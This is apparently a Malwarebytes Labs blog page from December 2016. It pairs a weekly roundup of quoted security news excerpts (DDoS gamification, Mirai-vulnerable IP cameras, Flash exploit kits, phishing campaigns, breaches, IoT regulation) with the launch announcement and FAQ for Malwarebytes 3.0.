  • Hackers Gamify DDoS Attacks With Collaborative Platform. “A Turkish hacking crew is luring participants to join its DDoS platform to compete with peers to earn redeemable points that are exchangeable for hacking tools and click-fraud software. The goal, security researchers say, is to ‘gamify’ DDoS attacks in order to attract a critical mass of hackers working toward a unified goal. The hacking platform is called Surface Defense and is being promoted in Turkish-language Dark Web forums including Turkhackteam and Root Developer, according to Forcepoint Security Labs, the security firm that first uncovered and reported the DDoS platform.” (Source: Kaspersky’s Threatpost)
  • Researchers Find Fresh Fodder For IoT Attack Cannons. “New research published this week could provide plenty of fresh fodder for Mirai, a malware strain that enslaves poorly-secured Internet of Things (IoT) devices for use in powerful online attacks. Researchers in Austria have unearthed a pair of backdoor accounts in more than 80 different IP camera models made by Sony Corp. Separately, Israeli security experts have discovered trivially exploitable weaknesses in nearly a half-million white-labeled IP camera models that are not currently sought out by Mirai.” (Source: KrebsOnSecurity)
  • Flash Exploit Found In Seven Exploit Kits. “A nasty Adobe Flash zero-day vulnerability that was remediated in an emergency update in October 2015 was thereafter co-opted by seven exploit kits, according to an analysis published today by researchers at Recorded Future. The Adobe vulnerability, CVE-2015-7645, was also used by the Russian APT group known as APT 28, which laced spear phishing emails with exploits targeting foreign affairs ministries worldwide. APT 28, also known as Sofacy, frequently targets NATO-allied political targets and in November was singled out by Microsoft for using separate Flash and Windows zero days in targeted attacks this year.” (Source: Kaspersky’s Threatpost)
  • Cybersecurity Gamification: A Shortcut To Learning. “Cybersecurity awareness trainings are usually a boring affair, so imagine my colleagues’ surprise when I exited the room in which I participated in a demonstration of the Kaspersky Interactive Protection Simulation (KIPS) game and told them: ‘You have to try this!’ This enthusiasm is apparently shared by the overwhelming majority of people who undergo one or more of the trainings that make part of Kaspersky Lab’s set of cybersecurity awareness products, game host Slava Borilin told me later.” (Source: Help Net Security)
  • What The Rise Of Social Media Hacking Means For Your Business. “A product marketing manager at your company just posted a photo on LinkedIn. The problem? In the background of the image, there’s a Post-It note that contains his network passwords. You can barely see it, but using artificial intelligence algorithms, hackers can scan for the publicly available image, determine there are network passwords, and use them for data theft. According to data security expert David Maynor, this is not rocket science. In fact, the AI program is easier to use than a search engine.” (Source: CSO)
  • Corporations Cite Reputational Damage As Biggest Cyber Risk. “Public businesses fear the possibility of losing customer or employee’s personally identifiable information (PII) and the subsequent brand-damage fallout more so than other risks, a new study published by the International Association of Privacy Professionals (IAPP) found. The IAPP Westin Research Center studied US Securities and Exchange Commission (SEC) Form 10-K disclosure statements from more than 100 publicly traded companies. The forms are where businesses share risk factors that could prove concerning to investors.” (Source: Dark Reading)
  • Law School Victim Of A Cyber Attack, Applicant Data Compromised. “The stress of applying to law school can be intense. The LSAT, the essay, the hassle of it all. Now there’s an additional stress factor — well, if you applied to the University of Wisconsin Law School in 2005-06. Last week Wisconsin Law experienced a cyber attack in which the personal information — including Social Security numbers — of 1,213 applicants from the 05-06 season was compromised. That’s a real… unexpected downside to applying to law school.” (Source: Above the Law)
  • Global Businesses In Firing Line As Hackers Target Christmas Gadgets. “F5 Networks (NASDAQ: FFIV) and Loryka today revealed the findings of a report examining the use of connected devices as cyber weapons by hackers. The report, entitled ‘DDoS’s Newest Minions: IoT Devices,’ was created by F5 Labs using data from F5 partner Loryka and shows that hackers are increasingly searching for products with network connectivity to manipulate for their own means. With one in three Brits set to give gifts leveraging the Internet of Things for Christmas this year, the influx of smart products will also provide a welcome present for hackers.” (Source: IT Security Guru)
  • Phishing Malware August Lures Customer Service Staff. “A new malware-laden phishing campaign, dubbed August, has been detected targeting customer service and managerial staff at retailers, according to a new report from Proofpoint. The clever ploy spreads through an email arriving in the inboxes of targeted individuals with subject lines referring to supposed purchases via the company’s website. Recipients are specifically selected who are appropriate reps to deal with customer issues. The message further dupes recipients by saying more detailed information is contained in the attached document.” (Source: SC Magazine)
  • New Call To Regulate IoT Security By Design. “A Washington, D.C. think tank whose mission is critical infrastructure security has joined the call for lawmakers to consider regulating the security of connected devices. In a report published this week, the Institute for Critical Infrastructure Technology pinned the blame for a rash of Mirai malware-inspired IOT botnet DDoS attacks on manufacturer negligence. The report points out the lack of security by design in devices such as DVRs and IP-enabled closed circuit TV cameras that are protected by weak or known default credentials as the root cause for the emergence of these attacks. Further, they caution that the availability of the Mirai source code has brought these large-scale attacks within reach of script kiddies, criminals and nation-states alike.” (Source: Kaspersky’s Threatpost)
  • Russia Proposes 10 Year In Prison Sentence For Hackers And Malware Authors. “The Russian government has introduced a draft bill that proposes prison sentences as punishment for hackers and cyber criminals creating malicious software used in targeting critical Russian infrastructure, even if they have no part in actual cyber attacks. The bill, published on the Russian government’s website on Wednesday, proposes amendments to the Russian Criminal Code and Criminal Procedure Code with a new article titled, ‘Illegal influence upon the critical informational infrastructure of the Russian Federation.'” (Source: The Hacker News)
  • Your Public Facebook Posts Might Still Be ‘Private’ In UK Cops’ Eyes. “Cops are all over social media, using monitoring tools to keep tabs on sporting events, protests, and more. These tools often aren’t just about gathering public posts or tweets; sometimes, they’re used to scrape metadata in aggregate and map out somebody’s movements over time too. But according to the UK’s National Police Chiefs’ Council (NPCC), which coordinates police forces across the country, you might have a reasonable expectation of privacy over your social media posts, even if they are public.” (Source: Vice’s Motherboard)
  • Fingerprint Passwords Not Theft-proof. “It sounds like a great idea: Forget passwords, and instead lock your phone or computer with your fingerprint. It’s a convenient form of security — though it’s also perhaps not as safe as you’d think. In their rush to do away with problematic passwords, Apple, Microsoft and other tech companies are nudging consumers to use their own fingerprints, faces and eyes as digital keys. Smartphones and other devices increasingly feature scanners that can verify your identity via these “biometric” signatures in order to unlock a gadget, sign into web accounts and authorize electronic payments.” (Source: Longview News Journal)
  • Threats Of Tomorrow: Using AI To Predict Malicious Infrastructure Activity. “The ever-increasing scale and complexity of cyber threats is bringing us to a point where human threat analysts are approaching the limit of what they can handle. We believe the next-generation of cyber threats must be tackled by a combination of machines equipped with artificial intelligence (AI) and human analysts — what we call centaur threat analysts. One example of this is presented here: a new approach to forecasting malicious IP infrastructure by using machine learning.” (Source: Recorded Future)
  • Tighe: Insider Threat Is Never Going Away. “The insider threat is never going to go away. This statement, echoed by many in government and directly by Vice Adm. Jan Tighe, deputy chief of naval operations for information warfare and director of naval intelligence, is a recognition that the insider threat problem is virtually impossible to defend against.” (Source: C4IRSNet)
  • Researchers Question Security In AMD’s Upcoming Zen Chips. “As more computing heads to the clouds, security researchers are questioning the security of virtual machine control panels called hypervisors. One of the first hardware-based solutions to address these concerns will be deployed by chip manufacturer AMD, called Secure Encrypted Virtualization. The feature is part of its upcoming x86 AMD Zen server family of microprocessors, slated to be released in the second quarter of 2017.” (Source: Kaspersky’s Threatpost)
  • Phishing From The Middle: Social Engineering Refined. “Phishing attacks have long been associated with malicious emails that spoof well-known institutions in order to trick users into coughing up credentials to banks accounts, email accounts, or accounts for major online services. Phishes that exploit the good name of trusted brands familiar to users have also been known to deliver ransomware, backdoors, and other malicious software designed to compromise the companies and organizations those users work for. Spoofing well known institutions and brand names is old hat, though, and users have become increasingly wary of emails claiming to hail from familiar companies and organizations. In response, the bad guys have been refining their use of social engineering, the key to any successful phishing campaign.” (Source: Spiceworks)
  • ‘We Could Not Deliver Your Parcel’ Email Could Be Scam. “As Christmas approaches, experts suggest an extra dollop of caution before clicking on email package delivery notices. Fake notifications are proliferating, bringing not holiday cheer — but holiday ransomware. The holiday phishing season began just before Thanksgiving and will likely extend until after Christmas, said Caleb Barlow, vice president for IBM Security.” (Source: USA Today)
  • Software Salesman Pleads Guilty To PoS Scam. “A Washington state man has pleaded guilty to wire fraud for selling revenue-suppression software (RSS) to hospitality and retail businesses for tax evasion purposes in a scam that cost the US government more than $3.4 million. The US Department of Justice (DoJ) says John Yin sold a software program called Tax Zapper that allowed users to portray inaccurate sales figures, thus lowering their tax obligations.” (Source: Dark Reading)
  • Child Porn On Government Devices: A Hidden Security Threat. “Daniel Payne, director of the Pentagon’s Defense Security Service, admitted this spring to encountering “unbelievable” amounts of child pornography on government computers. The comment came during an event in Virginia where military and intelligence officials gathered to address threats posed by federal workers. Mr. Payne, who spent much of his career in senior CIA and intelligence community roles before taking the Pentagon post, wanted to stress the value of monitoring employees’ systems to ensure they remained fit to handle top-secret information.” (Source: The Christian Science Monitor’s Passcode)
  • 15 Under 15: Rising Stars In Cybersecurity. “Kids born after the year 2000 have never lived a day without the internet. Everything in their lives is captured in silicon chips and chronicled on Facebook. Algorithms track how quickly they complete their homework; their text message confessions and #selfies are whisked to the cloud. Yet the massive digital ecosystem they inherited is fragile, broken, and unsafe. Built without security in mind, it’s constructed on faulty code: From major companies such as Yahoo to the US government, breaches of highly sensitive or personal files have become commonplace. The insecurity of the internet is injecting itself into presidential politics ahead of the November election. In the not too distant future, digital attacks may set off the next war.” (Source: The Christian Science Monitor’s Passcode)
  • Malaysia To Establish Cybersecurity Academy. “The Malaysian Digital Economic Corporation (MDEC) and Protection Group International (PGI) have signed an agreement to work together to develop a cybersecurity academy in Malaysia. It will be known as the UK-APAC Centre of Security Excellence and will see PGI and MDEC collaborate, generate and formulate awareness and strategies to regularly promote bilateral cybersecurity research and investment opportunities. PGI will provide strategic advice on the design of the academy’s cybersecurity courses, infrastructure and resources.” (Source: InfoSecurity Magazine)
  • Facebook Begins Asking Users To Rate Articles’ Use Of ‘Misleading Language’. “A survey asking users about “misleading language” in posts is the latest indication that Facebook is facing up to what many see as its responsibility to get a handle on the fake news situation. At least part of its solution, it seems, is to ask users what they think is fake. The “Facebook Survey,” noticed by Chris Krewson of Philadelphia’s Billy Penn, accompanied (for him) a Philadelphia Inquirer article about the firing of a well-known nut vendor for publicly espousing white nationalist views. (It’s a small town, everyone knows everyone.)” (Source: TechCrunch)
  • Nintendo Teams Up With HackerOne To Secure 3DS Via Bounty Program. “Security vulnerabilities are a nightmare for a console company. Piracy and inappropriate content are particularly troublesome to Nintendo, so it’s teamed up with the web site HackerOne to find information on possible exploits of the 3DS platform. This is being done by offering a bounty for any security issues found in that hardware family specifically, with rewards starting at $100 and going all the way up to $20,000 for any major issues that are discovered. The rewards are currently focused on discovering problems in the 3DS hardware or Nintendo-published titles, so vulnerabilities in, for example, the general eShop structure or exploits from bugs in non-Nintendo games would be exempt.” (Source: Hardcore Gamer)

Safe surfing, everyone!

The Malwarebytes Labs Team


Announcing Malwarebytes 3.0, a next-generation antivirus replacement

Malwarebytes - Thu, 12/08/2016 - 12:59

I am thrilled to announce the launch of our next-generation product, Malwarebytes 3.0! This product is built to provide comprehensive protection against today’s threat landscape so that you can finally replace your traditional antivirus.

Our engineers have spent the last year building this product from the ground up and have combined our Anti-Malware, Anti-Exploit, Anti-Ransomware, Website Protection, and Remediation technologies all into a single product which we simply call “Malwarebytes.” And it scans your computer 4 times faster!

With the launch of Malwarebytes 3.0, we are confident that you can finally replace your traditional antivirus, thanks to our innovative and layered approach to preventing malware infections using a healthy combination of proactive and signature-less technologies. While signatures are still effective against threats like potentially unwanted programs, a large portion of our malware detection events already comes from our signature-less technologies like Anti-Exploit and Anti-Ransomware, and that trend will only continue to grow. For many of you, this is something you already know, since over 50% of our customers already run Malwarebytes as their sole security software, without any third-party antivirus. But rest assured, we continue to support compatibility if you choose to use a third-party antivirus or other security software alongside Malwarebytes 3.0.

With the combination of our Anti-Malware ($24.95), Anti-Exploit ($24.95) and Anti-Ransomware (free, beta) technologies, we will be selling Malwarebytes 3.0 at $39.99 per computer per year, 20% less than our previous products combined and 33% less than an average traditional antivirus. But don’t worry, if you are an existing customer with an active subscription or a lifetime license to Malwarebytes Anti-Malware, you will keep your existing price and get a free upgrade to Malwarebytes 3.0. If you have both an Anti-Malware and an Anti-Exploit subscription, we will upgrade you to a single subscription to Malwarebytes 3.0, reduce your subscription price and add more licenses to your subscription. More on that below! As always, we will be keeping malware remediation absolutely free.

I am so excited about this product and its ability to replace your traditional antivirus. It’s something we’ve been working toward for many years, and something both our consumer and business customers have been asking for.

See Malwarebytes 3.0 in action by viewing this video. You can download Malwarebytes 3.0 by clicking this link.

If you have any questions, please read the FAQ below first and then ask away!

Marcin


Frequently Asked Questions

The complete Malwarebytes 3.0 Frequently Asked Questions can be found in our forums. Below is a selection of the most relevant FAQs.

So, I can replace my traditional antivirus?
Yes! As I said above, over 50% of our customers already have too. We believe in layered defense and built Malwarebytes 3.0 to provide the right mix of proactive and signature-less technologies to combat modern threats and zero-day malware. The combination of our Anti-Malware, Anti-Exploit, Anti-Ransomware, Website Protection, and Remediation technologies has you better covered against modern threats than the traditional antivirus companies that charge more for less effective protection.

Can I still run Malwarebytes alongside my Symantec, McAfee, etc.?
Certainly! We built Malwarebytes 3.0 to be compatible with all major antivirus software, even Windows Defender and Microsoft Security Essentials.

I’m an existing subscriber of Malwarebytes Anti-Malware. How much do I have to pay?
You don’t have to pay anything extra. Even though Malwarebytes 3.0 sells for $39.99, we are grandfathering ALL our existing customers at their original price. So if your subscription is currently $24.95, that is the price it will remain at, and you can get Malwarebytes 3.0 without having to pay anything extra. Your existing license key will work automatically with Malwarebytes 3.0.

I have a Malwarebytes Anti-Malware lifetime license. Will it work for Malwarebytes 3.0?
Yes! Simply install Malwarebytes 3.0 on top of your Malwarebytes Anti-Malware and your lifetime license will automatically apply to Malwarebytes 3.0.

Which Operating Systems does Malwarebytes 3.0 work under?
We continue to support all versions from Windows XP to Windows 10. Our Anti-Ransomware technology is only enabled on Windows 7 and higher.

How do I upgrade my Malwarebytes Anti-Malware to Malwarebytes 3.0?
Simply download and run the installer from here. Malwarebytes 3.0 will automatically upgrade Malwarebytes Anti-Malware 2.x to Malwarebytes 3.0 and apply its license key accordingly.

How do I upgrade to Malwarebytes 3.0 if I also have Anti-Exploit or Anti-Ransomware installed?
Simply download and run the installer from here. Malwarebytes 3.0 will automatically remove the old Anti-Malware, Anti-Exploit and Anti-Ransomware and upgrade them all to Malwarebytes 3.0.

I’m a business customer and I want Malwarebytes 3.0! When can I get it?
Small businesses that use the unmanaged Malwarebytes Anti-Malware 1.x or 2.x versions can uninstall the old product and install the new Malwarebytes 3.0 Premium. The centrally managed Malwarebytes 3.0 will be shipping for business customers by early next year. We’re very excited about some really cool endpoint protection management technologies we have in the pipeline for our business customers.
